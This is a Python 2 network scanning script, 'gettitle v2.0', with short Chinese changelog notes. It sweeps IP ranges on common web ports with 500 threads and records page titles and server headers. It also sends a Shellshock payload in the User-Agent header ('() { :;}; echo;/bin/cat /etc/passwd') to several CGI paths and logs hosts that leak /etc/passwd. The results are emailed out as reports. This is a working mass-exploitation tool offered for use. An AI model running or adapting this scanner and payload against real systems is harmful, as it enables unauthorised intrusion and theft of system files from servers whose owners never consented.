python gettitle v2.0
#!/usr/bin/env python # coding=utf-8 import threading import requests import Queue import sys import re import time import warnings import datetime import argparse from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart import smtplib import httplib __author__ = 'depycode' __version__ = 'gettitle v2.0' warnings.filterwarnings("ignore") #ip to num def ip2num(ip): ip = [int(x) for x in ip.split('.')] return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3] #num to ip def num2ip(num): return '%s.%s.%s.%s' %((num & 0xff000000) >>24, (num & 0x00ff0000) >>16, (num & 0x0000ff00) >>8, num & 0x000000ff ) # def ip_range(start, end): return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff] def bash_exp(host): headers = {'User-Agent':'() { :;}; echo;/bin/cat /etc/passwd','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'} try: res = requests.get(host,headers=headers,timeout=8) if "root:" in res.content: return host except: pass # def bThread(iplist): threadl = [] queue = Queue.Queue() for host in iplist: queue.put(host) for x in xrange(0, int(SETTHREAD)): threadl.append(tThread(queue)) for t in threadl: t.start() for t in threadl: t.join() #create thread class tThread(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while not self.queue.empty(): host = self.queue.get(block=False) try: checkServer(host) except: continue def checkServer(host): UA = {'user-agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'} k = int(host.split(':')[1]) try: if k==443: aimurl = "https://"+host #print aimurl response = requests.get(url = aimurl,headers = UA,verify=False,timeout = 8) else: aimurl = "http://"+host #print aimurl response = requests.get(url = aimurl,headers = UA,timeout = 8) #print response.headers status = response.status_code try: serverText = response.headers['server'] except: serverText = "" try: titleText1 = re.findall(r'<title>(.*?)</title>',response.content,re.S)[0] try: titleText = titleText1.decode('utf-8').encode('utf-8') except: titleText = titleText1.decode('gbk','ignore').encode('utf-8','ignore') except: titleText = "" saveData = {"ip":host,"port":str(k),'aimurl':aimurl,"status":status,"server":serverText,"title":titleText} print saveData Data.append(saveData) cgi_poc = ['/cgi-bin/index.cgi','/cgi-bin/login.cgi','/cgi-bin/test-cgi'] for path in cgi_poc: exp_url = aimurl + path exp_res = bash_exp(exp_url) if exp_res != None: bash_list.append(exp_res) except: pass def cmd(): iplist_a = [] parser = argparse.ArgumentParser(description='GET TITLE .. Author::depycode') group = parser.add_mutually_exclusive_group() group.add_argument('-i', action="store", dest="iprange", help="use:: python gettitle.py -i 10.100.1.1-10.100.1.254", ) group.add_argument('-f', action="store", dest="ipfile", help="use:: python gettitle.py -f ip.txt", type=str, ) args = parser.parse_args() ipfile = args.ipfile ip = args.iprange if ip: iplist_a = ip_range(ip.split('-')[0], ip.split('-')[1]) elif ipfile: iplist_tmp = open(ipfile).readlines() for i in iplist_tmp: iplist_a.append(i.strip()) else: parser.print_help() exit() return iplist_a def report(data): t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time())) filename = 'Title'+'-'+str(t)+".html" f = open(filename,"w+") table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>\n<tr><th>url</th><th>stauts_code</th><th>server</th><th>title</th>\n" f.write(table1) for i in data: rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>%s</td><td>%s</td><td>%s</td></tr>\n" %(i['aimurl'],i['ip'],i['status'],i['server'],i['title']) f.write(rows) table2 = "</table>" f.write(table2) f.close() return filename def report2txt(data): t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time())) filename = "ip-"+str(t)+".txt" f = open(filename,"w+") for i in data: url = i['aimurl'] f.write(url) f.write("\n") f.close() return filename def reportBash(data): t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time())) filename = 'bash' + str(t) + '.html' f = open(filename,'w+') table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>\n<tr><th>url</th><th>bash_valu</th>\n" f.write(table1) for i in data: rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>ON</td></tr>\n" %(i,i) f.write(rows) table2 = "</table>" f.write(table2) f.close() return filename def SendMail(f1,f2,f3): #创建一个带附件的实例 msg = MIMEMultipart('alternative') text = "报告大王-扫描完成" att = MIMEText(text, 'plain') #构造附件1 att1 = MIMEText(open(f1, 'rb').read(), 'base64', 'utf-8') att1["Content-Type"] = 'application/octet-stream' att1["Content-Disposition"] = 'attachment; filename="report.html"'#这里的filename可以任意写,写什么名字,邮件中显示什么名字 att2 = MIMEText(open(f2, 'rb').read(), 'base64', 'utf-8') att2["Content-Type"] = 'application/octet-stream' att2["Content-Disposition"] = 'attachment; filename="ip.txt"' att3 = MIMEText(open(f3, 'rb').read(), 'base64', 'utf-8') att3["Content-Type"] = 'application/octet-stream' att3["Content-Disposition"] = 'attachment; filename="bash.html"' msg.attach(att) msg.attach(att1) msg.attach(att2) msg.attach(att3) #加邮件头 msg['to'] = '*************' msg['from'] = '*************' msg['subject'] = 'Scan Finished' #发送邮件 try: server = smtplib.SMTP() server.connect('*************') server.login('*************','*************') server.sendmail(msg['from'], msg['to'],msg.as_string()) server.quit() print u'发送成功' except Exception, e: print str(e) if __name__ == '__main__': global SETTHREAD global Data global bash_list Data = [] bash_list = [] starttime = datetime.datetime.now() try: SETTHREAD = 500 iplist1 = cmd() ports = [80,81,8080,8000,8888] #ports = [80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,803,806,8094,8000,8001,8002,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8888,9002,443,873,2601,2604,4848,8008,8104,8880,8877,9999,3128,5432,2049,7001,7002,7003,7004,7005,7006,7007,7008,7009,9200,9871,4440,6082,8099,8649,9000,9090,50000,50030,50070] iplist = ['{}:{}'.format(x, y) for x in iplist1 for y in ports] print '\n[INFO] Will scan '+str(len(iplist1))+" host...\n" bThread(iplist) except KeyboardInterrupt: print 'Keyboard Interrupt!' sys.exit() filenamehtml_report = report(Data) filenametxt_ip = report2txt(Data) filenamehtml_report_bash = reportBash(bash_list) SendMail(filenamehtml_report,filenametxt_ip,filenamehtml_report_bash) endtime = datetime.datetime.now() print "Finished in "+str((endtime - starttime).seconds)+"S"
1:改进了线程
2:增加bash漏洞检测